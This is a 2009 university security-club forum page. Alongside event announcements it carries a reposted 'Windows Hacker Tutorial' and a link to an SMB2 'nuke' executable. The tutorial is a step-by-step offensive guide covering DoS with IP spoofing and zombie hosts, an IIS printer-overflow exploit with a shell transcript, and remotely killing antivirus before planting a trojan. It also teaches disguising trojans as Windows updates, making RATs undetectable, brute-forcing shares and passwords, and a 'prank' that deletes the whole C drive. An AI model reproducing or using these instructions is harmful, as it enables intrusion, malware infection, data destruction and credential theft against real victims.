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Information Systems Security Association
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ISSA - Being updated, more to come. . .
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on: October 16, 2009, 06:36:38 PM
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Once again thank you to all who attended our ISSA groups first ever event for 2009. It was a success and we look forward to there being more to come.
We invited James Baird to come and speak at KSU and he spoke on security awareness. To say that his presentation was creative as well as informative would be somewhat of an understatement. I believe that we as potential or working security professionals take our jobs to be boring, or even a bit serious at times. The presentation sent the message to me that you not only have to relay your security message to end users in a fun and constructive manner but you also have to do it in a way as to get their attention. I will be the first to admit that when James first began his presentation I had absolutely no idea where he was going with it, and somehow he made it from chinese food all the way to relating it to "defense in depth" in one very interesting manner. For those of you who were not able to attend I hate that you did not, because as security professionals at times it's hard to sit back and relate things on a day to day basis, and that was an important lesson that was taught. Overall the event was a success, and I couldn't have been happier. See you at the next event!!!!! |
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on: October 13, 2009, 12:47:09 PM
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Here's a .pl i found, you'll need to edit the ip address
Code: [Select] #!/usr/bin/python |
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on: September 25, 2009, 04:40:27 PM
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Interesting article about a new network security software recently developed at Wake Forest that mimics ants.
http://www.wfu.edu/wowf/2009/20090921.ants.html |
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on: September 18, 2009, 09:58:06 AM
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Courtesy of illwill -
you probably all have seen the python code making the rounds yesterday i was to lazy to install python so i converted it to perl and assembly http://illmob.org/smb2nuke.exe peep the old skool winuke95 throwback gui ![]() |
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on: September 16, 2009, 09:03:30 PM
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We will have a speaker coming to KSU on Thursday, October 15th from 5:00pm to 6:00pm in room 2008 of the Clendenin Building. His name is James Baird and here is a little more information about him.
James Baird is the Vice President, Security Officer for Prommis Systems, LLC and is responsible for the overall physical and logical security posture for Prommis. James has a BS in Management of Information Systems and a MS in Information Assurance (with honors) along with several certifications, chiefly the CISSP, CISM, ISEB ITIL Foundation 2.0, and ISO 27001 Lead Implementer certifications. James' past experience is from the Telecommunications and Financial sectors where he managed the Information Security and Governance programs for domestic and international companies. |
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on: August 31, 2009, 12:33:09 PM
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Nuking was in the Windows 95/ NT4 days. The original WinNuke was for Windows 95. It attacked the host on port 139 (win95) and port 135 (winNT). Yes someone people still use Windows 95 and NT4, but not alot of people. If you find someone by any chance, use Superkod. I found it works best. Open up the program, type in the IP and Click NUKE. If the person is using Win95 or WinNT4, and their unpatched, their internet connection will be dropped or they will get a BSOD.
That's all very well and all, but with a program like KOD, it does not hide your IP from your attacker. If they are running a firewall, they will see where all this traffic is coming from and they will see it's YOU. So now, you need to spoof your IP address so the attacker cannot see who the attack is coming from. For Win2k/XP, I would recommend using Smurf2k, Nemesy or Jolt that was designed for attacking Win2k, but Jolt does not spoof the IP so beware, only Smurf2k and Nemesy spoofs the IP. Smurf2k uses a broadcast list, a list it uses for address to spoof from. So if you attack someone, they will see IP's attacking them that does not exist. Before you attack someone, find out what connections he has, because if he want to attack him with bandwidth, you will need more than him. So if it is an modem user with no firewall, you will be able to disconnect him yourself. If it is someone with more bandwidth than you, a firewall or a patched system, you will need BANDWITH to disconnect him. So gather around a few of your buddies, give them a DOS tool and all of you guys at the same time attack him. Make sure you run a firewall that blocks incoming IGMP, ICMP, UDP and TCP incoming connections if they start attacking back. Heck even better, infect a few hosts on a ADSL line or a corporate line with alot of bandwidth, and take down microsoft.com. This is the part when Zombies comes in. You infect a few hosts (Zombies) and control them to do a DOS attack on someone. It works almost like a trojan which you infect their PC and take control of it. Try Freak88 - it allows you to control a few PC's at the same time and do a DOS attack. (7) Getting a PC name, MAC address and user name logged on So you would like to know someone's PC name, or their MAC address of their network card or the username that currently logged onto the PC? It can be very useful to have this info on someone. Their PC name can be their own name or company name. Their MAC address is the address of their network card, which is static, means that it can never change. Their username can also be useful if you would like to know this persons name. All of this can only be retrieved if the person has a network card installed on their PC. In DOS prompt (Start, Run) type in " nbtstat -a IP" EX : nbstat -a 196.35.24.15, it will show something like this : Local Area Connection 3: Node IpAddress: [10.10.10.22] Scope Id: [] NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- PCNAME <00> UNIQUE Registered DOMAINNAME<00> GROUP Registered PCNAME<03> UNIQUE Registered PCNAME<20> UNIQUE Registered DOMAINNAME <1E> GROUP Registered USERNAME <03> UNIQUE Registered MAC Address = 00-22-AE-43-33-30 It will show you the PC name, domain name if it is connected to a domain and it will show the user name logged onto the PC. The MAC is static, meaning it never changes, useful for identifying someone. Your buddy attacks you, you check his IP and you do a "nbtstat" on him, and you gets his MAC address. So now if you check on his PC, and see he has got the same MAC address you know it was him attacking you. ( IP addresses, understanding itEveryone that connects to an network, has got a IP address. A IP address looks something like this : 80.65.123.25 Your network card has an IP and your modem has an IP address if you connect to the Internet, but both is diffident because your LAN is not part of the internet. When you connect to Internet, depending on your connection, you get a fixed ( static ) IP or a dynamic IP. Modem users gets a IP address that changed every time they reconnect to internet, Very useful if you attack people, so if you disconnect, then you get a diffident IP. If you have a ISDN or maybe ADSL connection most of the time you will get a static IP, so whenever you connect to internet you get the same IP every time. Attack someone without IP spoofing, they will be able to see it is your IP attacking them! They can then go to your ISP ( internet service provider ), check who does this IP belong to and you can get into trouble. This is where modem users are lucky, they don't have a static IP and then can go mad and attack people and so without being caught, well almost... Their ISP can still check who was using the certain IP for a certain time and what telephone number it was coming from, but its too much of a hassle for a simple DOS attack. IP spoofing is basically when you attack someone and you use a bogus IP. a DOS attack or whatever, it attacks the target, but the target only receives data from bogus IP's. IP's that does not really exist, or it does excist but it is someone else's IP, not yours. Every network cards has a burned in MAC address. a MAC address looks something like this : 00-40-AH-4E-E0-90, it cannot be changed - well kind of, so if you attack someone and they do a nbstat on you, get your MAC address of your network card, it is a simple way of identifying you as the attacker. (9) IIS ( Web server/web page) hacking IIS is Microsoft's internet server. It is very buggy and very exploitable. Defacing a IIS server is actually very easy. Alot of system administrators does not load patches on their IIS servers so they are the people who gets defaced (hacked). Current IIS servers I will show u to hack is IIS 4/5. IIS 6 is the industry standard at the moment, but there is still alot of IIS4/5 servers online. The way IIS server are being hacked is though buffer overflows and exploits. This is when a certain code is sent to the server, the server gets confused and grants you root access to the server. In the IIS hacking download section there is alot of IIS hacking tools making it easy for anyone to hack a IIS server. Not all webservers are run on IIS, there is many other webserver software out there like Apache. We will only be dealing with IIS servers. Firstly you have to find a IIS server. Dreamscape IISscanner is very useful. It gives you the option to scan a certain IP or an IP range. It will search and tell you if it finds any IIS servers, and which version the host is running.. Another way is to telnet to the IP on port 80. In dos prompt (Start, Run,CMD) type in : telnet 196.35.45.21 80. It will open telnet and show you what IIS the host is running. Web servers normally runs on port 80, but it can be any other specified port. If you find a IIS server, it's time to DEFACE it Go check on my IIS hacking page for IIS hacking programs. We will first use Jill-win32 for now. It exploits an IIS5 printer overflow. In dos prompt (Start, Run) run jill-win32. It will show you this :iis5 remote .printer overflow. dark spyrit <dspyrit@beavuh.org> / beavuh labs. usage: jill-win32 <victimHost> <victimPort> <attackerHost> <attackerPort> An example how to use it : jill-win32 196.65.56.32 80 196.89.65.45 69 - 196.65.56.32 is the IIS server you want to deface, port 80 is the port the server runs it IIS service on, 196.89.65.45. is your IP, and port 69 is the port TFPD32 (available from this zip file) will listen on. When you run jill-win32 it will exploit a printer overflow on the IIS server and create a backdoor on the server which will connect to port 69 on your PC, which TFPD32 listening on. Here is a another example : Download IISHack and do the following : Usage: IISHack1.5 [server] [server-port] [trojan-port] C:\send resume to hire@eeye.com> iishack1.5.exe www.[yourowncompany].com 80 6969 IISHack Version 1.5 eEye Digital Security http://www.eEye.com Code By: Ryan Permeh & Marc Maiffret eEye Digital Security takes no responsibility for use of this code. It is for educational purposes only. Attempting to find an executable directory... Trying directory [scripts] Executable directory found. [scripts] Path to executable directory is [C:\Inetpub\scripts] Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts. Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe Sending the exploit... Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and you should get a cmd prompt. C:\> telnet www.[yourowncompany].com 6969 Trying www.[yourowncompany].com... Microsoft(R) Windows NT(TM) (C) Copyright 1985-1996 Microsoft Corp. C:\WINNT\system32>whoami NT AUTHORITY\SYSTEM For those people who does not have a clue what's going on in here, go the script kiddie way and download the other GUI ( graphical user interface ) IIS hacking programs from my IIS page and let the program deface the web page for you. There is a few IIS tutorials in Windows hacker misc section. (10) Crashing Win95/Win98 PC with any access to a share Windows 95/98 does not react well to the /con/con command. Any Windows 98/95 PC can be crashed with this /con/con exploit, but you need access to a share on the PC, any access will work. Create a htm file with the following code in it : <html> <head><title>Crash!</title></head> <body> <a href="file://pcname/sharename/con/con">click me!</a> </body> </html> The pcname, is the PCname of the PC you want to crash ( or the IP ) and the sharename is the share you got access to.When you open the htm file and click on the link, it will crash ( BSOD ) the PC. (11) Creating undeleteable directories remotely Now this is something that can really create havoc!!! I tested it on Win9X and Win NT4 .Does not work on Win2k or Win XP. Beware don't try this on yourself!! Windows 9x and NT 4 has a flaw which allows an remote connection to create undeleteable, well practically undeleteable files and directories to be created anywhere on a remote machine. These files and directories can be deleted, but it takes about 2 minutes to delete through dos commands. Download NetBiosBomber, choose the target and choose which OS and you ready to makes someone's life hell. Remember if their system is update it will not work. (12) Connecting to mIRC through a Wingate A wingate is like a proxy server, anyone can connect to the server (some do have usernames and passwords), and then work through the server to connect to some other server. Then it will look like you are working form that server, your identity changed. mIRC is a internet relay chat client, a chat room client. Download mIRC now !! In mIRC there is a firewall option, this is where you specify your wingate server. Click the "use firewall" option, make sure its set to socks 4 ! and put in a wingate address in the "hostname". Port should be 1080 with no username or password. Wingate list available from Cyberarmy or you can use any port scanner, or you can use Proxy finder to search for socks wingate on a subnet. Scan any IP range for hosts that's got port 1080 open. Wingates are great for IRC to keep you anonymous. (13) Anonymous email / Email as any address Download RA-Anonymous email first. Then choose who u want to send to and from who u want the email to be from. For this to work you will have to find an smtp server that accepts relaying. . So in the server space put in : "smtp.mweb.co.za" - this smtp worked at the time I tested it.. and your are ready to send someone email from billgates@microsoft.com !! Use OPENRELAYCHECKER from my downloads page to download OPENRELAYCHECKER which you can use to search for email servers that support relaying.(14) Resetting and cracking Win2K or WinXP administrator password Resetting your Win2K admin password is easy. Boot up with a Win9X boot up disk or CD. Go to Winnt\system32\config directory. There will be a file called "SAM" Delete that file and reboot machine. Now the Administrator account password will be reset to blank ( no password ). Only works with FAT32 partitions. For Windows XP need this file which has a few utilities you can use to reset the XP administrator password. Then there is also a program called AdminHack which you load in a dictionary file to crack the administrator account if you have local access on the PC. (15) Connecting to MIRC/KAZAA/ICQ thru a firewall that has certain ports blocked with a SOCKS server When you behind a firewall and MIRC, Kazaa or ICQ is blocked you can use a technique called http tunneling. Basically your program to an program running on your computer and the programs redirects the data thru HTTP. Download HTTPORT or SOCK2HTTP. It will run a SOCKS server on your PC which you can use to connect MIRC, Kazaa or ICQQ or whatever program you want to use that is blocked by the firewall. In mIRC or Kazaa go to settings and tell the program to connect to your SOCKS server. Server address is 127.0.0.1 - your local IP and socks port is port 1080. (16) Killing programs or processes remotely Lets say you try and upload a trojan to someone's machine and their anti virus picks it up. Check if you can get a account on the machine with Administrator rights. If you have an account like that, you can use PSKILL and kill the anti virus program or firewall. You can basically kill any program or process running on the machine, but it must be a Win2k or XP machine. If the person is running norton anti virus the file will be something like nav32.exe. Now with pskill the command will be : pskill \\66.33.22.11 -u administrator nav32.exe 66.33.22.11 is the IP or pc name of the victim -u administrator is the account you have admin rights to Nav32.exe is the program file name or process you want to kill. You can use winlogon.exe even and it will most propably give a blue screen after you killed that process. So now you killed the anti virus or firewall and now you are ready to upload a trojan or keylogger or anything you like... (17) Getting someone's IP and doing a ping sweep Download IPstealer from WindowsHacker and put in your IP, then click on Convert IP, Click on Listen and send your victim the Link to use. When they open that link it will show up in IPstealer. If you need random IP addresses you can do a ping sweep. It scans a whole IP range and shows you which IP's are online. Download Supercan and put in a IP range. Start 80.23.23.1 to Stop 80.23.23.255 and choose "ping only" under scan type. It will scan the whole IP range and show you which IP's are online. (18) Pranks to pull on someone Here is a few things u can do to someone to annoy the living hell out of them ![]() 1) Blue Screen Of Death : Create a batch file "something.bat" and edit the file so it contains the following (Win9X only) C:\Aux\Aux or C:\Con\Con Now place this in the C:\Windows\Start Menu\Programs\StartUp folder, so when the pc reboots it will throw out a BSOD every time it starts up. 2) Deleting the persons whole C drive with this command : Deltree /y c:/*.* 3) Make a screen shot of the persons desktop. put that picture as their background and hide the start bar and desktop icons. With 2000 and XP, lock the PC and move the windows out of the way, just check how clever your friend really are. Or put a password one a screen saver and put the screen saver file into the startup folder. They will have to boot up into save mode to restore the screen saver. 4) A nice harmless trick, schedule something like a screen saver with a password on a PC for a certain time, sure to make someone scream. 5) Go to the windows directory and look for a file Win.ini. Edit the file and look for a line with : shell=Explorer.exe. Change this to something like YOUR PC HAS A VIRUS ON IT. When the PC gets restarted it will come up with that message and it will not boot up @ all. Look for system.ini, change the same, shell="explorer.exe to shell=". Bill Gates Hates You" ![]() (19) Cracking a user account locally and remotely - brute force or dictionary attack - Win2K and WinXP When you need the password of a account on your local machine or on a remote machine you can either brute force or dictionary attack the account. Remember this could take from 1 minute to a few days depending on how complex the password is. ------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
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on: August 31, 2009, 12:31:00 PM
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Never ask someone "how to hack". But to give you some initial topics, take a look from the article below. Don't blame me for it though, I didn't write it.
The best way to start hacking is to teach yourself !!! All programs mentioned can be downloaded from http://www.windowshacker.kickme.to/ Windows Hacker Tutorial V2.4 How do I hack? - There is no easy way how to hack. Google is your best friend.. REMEMBER THAT! Read any information you can find on hacking. Read hacking forums and check out hacking websites. Learn a programming language like C++. Get a book like Hacking for Dummies which will teach you alot. What do I need to be able to hack? - Firstly you need to understand how your computers operating system works, networks and protocols works, security settings and general PC knowledge. After you understand how it works you need hacking tools which helps you to hack. What is command prompt (cmd- the little dos Windows)? - Go START, RUN and type in: "cmd" What can I do in cmd? - You can can do various things with it like run exploits or do a ping request. Why does some of the hacking tools I download just close itself when I open them? - Lot's of hacking tools are DOS based and has to be run through CMD. If you double click on the program it will open a DOS box and automaticly close the box. From CMD you can navigate to the directory which your hacking tool is stored in and run it from there. Other hacking tools are GUI ( graphical user interface ) based and it will open like a normal Windows based program. What is a IP address? - Every computer connected to the Internet or some network has a IP address. Goto START, RUN and type in "cmd" then type in "ipconfig" it will show you your IP adress or adresses. It will look something like this : 81.35.99.84. IP = internet protocol. How do I find someone's IP adress? - Look further down in this tutorial and use IPSTEALER What can I do with a IP? - Well you need someone's IP before you can hack, portscan or DOS them. What is IP ping ? - It's a command you can use to check if someone's IP address is online, to check it they connected to the Internet or a network. In command prompt type in "ping 192.168.0.21" - this will show you something like this : Pinging 192.168.0.21 with 32 bytes of data: Reply from 192.168.0.21: bytes=32 time<1ms TTL=128 Reply from 192.168.0.21: bytes=32 time<1ms TTL=128 Reply from 192.168.0.21: bytes=32 time<1ms TTL=128 Reply from 192.168.0.21: bytes=32 time<1ms TTL=128 Ping statistics for 192.168.0.21: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms That means you can succesfully PING IP 192.168.0.21 which means the IP is online. If you get a message "request timed out" it means the IP is not online. Bytes=32 is the ammount of data which was sent to the host. Time<1ms is the time the host took to reply. Now remember that even though you cannot ping a IP, it does not mean the host is not online, ping requests might just be blocked. Why can't I ping a certain IP? - Either the IP is not online/ in use or the person your trying to ping is running a firewall which blocks ping requests or maybe your firewall is blocking outgoing ping requests What is 127.0.0.1 IP? - It is your PC's local loopback IP address. Why do I have two IP addresses when I do a ipconfig? - Well if your on a local LAN (Local area network) you will have a IP like 192.168.0.1. If your also connected to the internet you will have another IP address like 80.87.34.56. 192.168.0.1 is your local IP which you use to comunicate with your local internet network (lan) and 80.87.34.56 is your internet IP. What is a static and dynamic IP address? - Static means permanent set IP address - like a website will have a static IP address, it never changes. Dynamic means temporary IP address - dailing up to the Internet with a modem or most ADSL connections has dynamic IP's. Everytime you logon to the Internet your ISP ( Internet Service Provider ) will issue you a new IP address. I have sent someone a trojan but I cannot connect to their PC? - Either they are running a firewall which blocks you from connecting to their PC, or they are connected to the internet through a router. What do I do when someone is behind a router and I want to control their PC with a trojan? - You will need to use a trojan which uses reverse connections - meaning you don't connect to the host, the host connects to you. Bifrost is a trojan which has the mentioned function. Remember when someone is behind a router and your using IPstealer to get hold of their IP address, you are actually getting their routers IP, not their actual PC's IP. The router will have the persons internet IP (WAN IP) and their PC will have a difirent IP - their LAN IP. How do I check if my own PC is infected with a trojan? - Do a port scan on your PC and check which ports are open. If you find any open ports in this trojan port list you might be infected with a trojan. Download the trojan you think you might be infected with and connect to that specified port. What is a router? - A device which is used to route data on a network. a Router decides where certain traffic should be sent to. What is a firewall? - Its a software or hardware device which can block or permit certain ports or IP's or certain kinds of data. What is a port and what can I do with it? - Every program running on your PC which has some network function uses a specific port to send an receive data though. If you do a port scan you will see which ports are open on the host you scanned. Port 80 is normally a web server. Port 21 a FTP server ect ect.. Trojans also uses ports. Check this list of trojan ports, if you find an open port in this list, the host might be infected with a trojan, download the trojan and try connecting to the port. How do I do a port scan? - You need a program like superscan to do a portscan. Then all you do is add the ip you want to scan. Why do you want to scan ports? - If you scan a PC with a port scanner, it will show you which programs or services are running on the PC. Common ports: Ping : 7 Systat : 11 Time : 13 NetStat : 15 SSH : 22 Telnet : 23 SMTP : 25 Whois : 43 Finger : 79 HTTP : 80 POP : 110 What is a exploit? - It's a poorly coded piece in software which you can use to gain access to the system. There is many exploits available for the various MS Windows's out there. How do I use a exploit? - You first need to compile the exploit with a program like Bloodshed C++ compiler. Then you can start the exploit through command prompt and see if the system your trying to exploit is vulnerable to that specific exploit. Scroll down for more information about exploits. What is a exploit POC? - POC stands for proof of concept and it the proof that a exploit works. What is a DOS attack? - It is when too much data is being sent to a host and it cannot handle all the data and disconnects from the Internet. How do I see what connections is currently made to my PC? - In cmd type in "netstat" - it will show you IP addresses of connections to your PC and what port it is using. Also you can use Currports which has a GUI to show current connections and it has option to close the connection on a certain port. What is a MAC address? - Its a hard coded number, almost like a name which is embedded into a network card. It identifies the manufacturer of the card and a unique number for the card. No two network cards in the world has the same MAC address. How do I find out my own or someone else's MAC address? - Your own MAC = Goto cmd and type in "ipconfig /all" MAC address looks something like this : 00-13-20-A3-0B-4C Someone else's MAC address you need their IP address and then goto cmd and type in "nbtstat -a 192.168.0.5" or whatever IP they use. This will show you their MAC address as well as their currently logged on user. What is a Windows Registry and how do I access it? - Its where Windows stores most of the configurations of your operating system and most programs installed. You might used it to make a trojan server file you uploaded to the PC run automaticly when Windows starts up. To access the registry go START, RUN and type in "regedit" Carefull what you change in the registry, it might screw up you PC.. First make a backup of the registry. How do I hack a webpage/ web server? - Read the IIS hacking tutorial in the MISC download section on Windows Hacker. Remember not all webservers run IIS! What is IIS? - It is Microsoft's web server. IIS - Internet information server. Most webservers run on port 80. How do I check if a website is running on IIS? - Telnet to the website URL through CMD - "telnet www.siteyouwanttocheck.com 80" What is telnet? - Program which can be used to connect to remote computers or routers and to run commands by simply typing them in its window. How do I hack into a Gmail, Yahoo or Hotmail email account? - Every now and then someone discovers a way to get into those email servers, but the service provider fixes the security hole so fast, there is no straight answer for that. Best way is to install a keylogger on the victims PC and get their login details. Otherwise download THIS program which you can use to brute force a hotmail account. How do I hack into a POP3 email account? - Hydra 5.3 is a program which you can use to crack POP3 accounts. You will need a wordlist which Hydra will use to crack the POP3 password. What is a keylogger? - It is a program you install on someone's PC which captures every key that is pressed on their keyboard which is emailed to you or stored into a file. How do I get the administrator account password while logged in to the PC? - Locally run a program like Adminhack for local administrator account cracking. If you need to do it remotely run a program like Venom or Starbrute. What is a SAM file? - SAM file is the file which stores all the user accounts and their password hashes like the Administrator account. SAM file is stored in "C:\WINDOWS\system32\config" but it is locked and inaccessable while you are busy using Windows - meaning you can't copy it while your in Windows. You need to boot up with another operating system like NTFSDOS or Linux with NTFS support. When you copied the SAM file you can crack the passwords stored in the SAM file with a program like LC5. With Pwdump6 it is possible to get access to the SAM file while logged into windows. It can also connect to a remote PC and grab the password hashes from the SAM file. Administrator account is needed. Ophcrack live CD uses rainbow tables to crack user account password, and it boots from a CD. How do I reset a administrator or some other account password on Win2K/WinXP/WinNT/Win2003? - Download Offline NT Password & Registry Editor which you can use to create a bootup disk or CD and then boot up the PC and then you can reset the password. Just remember that this program will not show you the password, you can only change the password. How do I crack a administrator password? - If you need to crack a administrator password you will need to copy the SAM file to another machine and crack it. Download this NTXP-Cracker program which has included everything you need to boot up the PC, copy the SAM file and crack the SAM file on another machine. How do I find out what operating system does my target run? - Download Detect and use it against your targets IP address. Result: C:\>detect.exe 127.0.0.1
(2) Securing your Windows PC Firstly install Win XP with the latest Service pack. Run Windows update (START, ALL PROGRAMS, WINDOWS UPDATE) and update Windows and all your device drivers. Go download all the latest versions of applications you use like FTP server or proxy or so, old versions of programs is insecure and you could be hacked that way.. Also try Autopatcher to update your Windows. Disable the "guest" account on your PC and rename your "administrator" account. Right click My Computer and choose Manage. Stop any services you don't use, but be careful not to stop something that u use ( RIGHT CLICK MY COMPUTER, CHOOSE MANAGE, SERVICES AND APPLICATIONS, SERVICES). Stop the MESSENGER and REMOTE REGISTERY services. Delete the admin shares, share it as something else and then stop sharing it. Then when you reboot it will not share it automatically again. With these admin shares domain admin's and hackers can access your PC. Make sure to put a complex password on all your accounts. Make your hard drive NTFS - it is the file system you format your harddrive with. Put a password on your BIOS and make sure you change the boot order to boot first with the hard drive, so someone cannot boot up with a CD, delete your SAM file, or crack its password and gain administrator access to your PC.. Make sure the built in firewall is enabled. Check in control panel for Windows firewall. This firewall may be the cause that some of your hacking applications and tools will stop working, so if you have a problem with an application make sure to add this program to your windows firewall exceptions. Install some kind of anti virus program, Norton Anti Virus works good, but remember that alot of hacking tools are picked up by Anti Virus, so disable your Anti Virus before running those tools. Also install a Spyware removal tools like Spyware Doctor Spyware is iritating software which is installed onto your PC through files you download from the net or webpages you open which has mallicious code in it. It slows down your PC and might send your information to the spyware creator. (3) Using a Trojan / RAT Trojans is one of the first things you must learn when you want to hack. A trojan is a small program you send to someone to infect their PC so you can control their PC, steal passwords, files or just have some fun. Every trojan works on a diffirent port, like Sub7, works on port 27374. If you scan a PC and find that port 27374 is open, it means the machine is infected with Sub7. Now ofcourse the trojan can be set with a password, its up to you to crack it then. Now remember that most trojans are picked up by Anti Virus software. You need a new released trojan which AV does not pick up. The trojan most people know is Sub7 . Before you can start using the trojan, you first need a host to infected with a trojan. A host can be infected in a alot of ways. You can send the host the trojan server file, and tell them it's an game or a firewall or whatever you like it to be. Best is to rename the file to something they will think is usefull like : WindowsXP_update.exe. You can email them this file or put it on a downloads area on a web page, use your imagination. When sending a trojan through email, remember to ZIP or RAR the file, most email hosts do not allow you to send .exe files. If you cannot get hold of a undetecable trojan, you can use a program like Pestil to make the trojan undetectable. I have tested Pestil with Biforst and it was not detected by NOD or AVG anti virus packages. You can also bind the trojan file with another file, any executable file the trojan can be binded to. Always remember to rename the file, change the program icon and the put a password on the server file. Bind the file with another file and set the file to automatically delete itself after executed, or set it to give an system error. When you infect a host or find a infected host, it's time to connect. Easy way to find trojans infect hosts is with Trojan hunter. Choose an IP range to scan through and it will search for trojan infected hosts. When you found an infected host, download the trojan client from my Trojans page.. Connect with the trojan to the host IP, to the certain port the trojan works on and you are ready to take control. Each trojan uses a diffident port. Here is a list of ports which a certain trojan works on. With most trojans, you will be able to log keystrokes on a PC, even get logged into a file, and when the host is online it will email the keystrokes to an specified email address. Delete or copy files, reboot the PC, make screen captures or disable the screen or mouse. With Sub7 you can do anything on the infected host, just as if you where sitting in front of the PC itself. Important thing to remember. A trojan comes with a file called "server.exe". Never run that file on your own PC, it will infect your PC with the trojan! Use the trojans configuration file to make changes to the "server.exe" file and then send the file to a victim. There is also trojans which has the option to do a reverse connection. Very usefull if the person sits behind a router or firewall. After your infected the victims PC, the trojan will automaticly connects to you, thus getting past the problem of connecting through a router or firewall. Remember that if you do not connect to the Internet directly (with a modem) and you sit behind a router, you will need to forward the trojan ports in your routers configuration if you are doing a reverse connection. Try out Bifrost RAT or Poison Ivy RAT which can do reverse connections, usefull when the host is behind a router. Most of us do not have a static IP address, I recomend using a service like no-ip which gives you a name like hacker.no-ip.org which can be pinged from anywhere on the internet and it will give your current IP address. Set your reverse connection trojans to connect to this name. (4) Hacking a PC through NetBios shares Finding PCs with shares over a LAN or over internet is very easy. Choose a certain IP range and use Netscan to search through the IP range for PCs with shares. A PC can only have shares if it is connected to a network or has file and printing enabled, so mostly computers with an network card. If you find a computer with a share, use Windows to connect to that share. Go START, RUN and type in "\\IP\sharename". Example "\\198.55.67.244\c" or with the PC name "\\pc1\c" - then you will have access to the share, to delete, copy or rename files or directories, depending what it was shared as, but most people share things with full access and no password. If you find a PC with shares, but when you try and connect to it, it ask you a password, the easy way to crack it is with PQWak, this program brute force cracks the password for you - Win9X only. Windows NT/XP, works through permissions, so if something is shared, it is shared with permissions to the folder, and permissions is given to an user name. But alot of people make shares with full access to anyone. Win2K/XP accessing an share like the C$ share will ask you an username and password, if there is no password specified by the person who's PC it is.. Trying username as Administrator and password blank. Most people got administrator account password blank, easy way to get onto their shares. Windows 2000 and XP you can use Venom or Starbrute to brute force or dictionary crack local accounts. If you gain access to someone's hard drive, copy a trojan server file into their startup folder, and then when they reboot their PC, the trojan will run and you will have access to their PC with the trojan. |
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on: August 17, 2009, 11:24:28 AM
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Well, the club has been a little inactive lately, but I've finally decided to set some options in the site so I will be emailed when we have new members. . . Seeing as how the oldest member requested access to the site back in September '08. . . I'd like to say sorry to the newest members, and ask that anyone new looking for access to the site, go ahead and sign up. I'll will accept the new members and posts at the very least once a week on Fridays.
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on: September 19, 2008, 11:10:44 AM
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Awesome, thanks for the site. Is there anyway to convert my old lm1-7all tables to the indexed tables that the site uses? I saw that they had and indexed table-unidexed table converter, but i didn't see vice versa.
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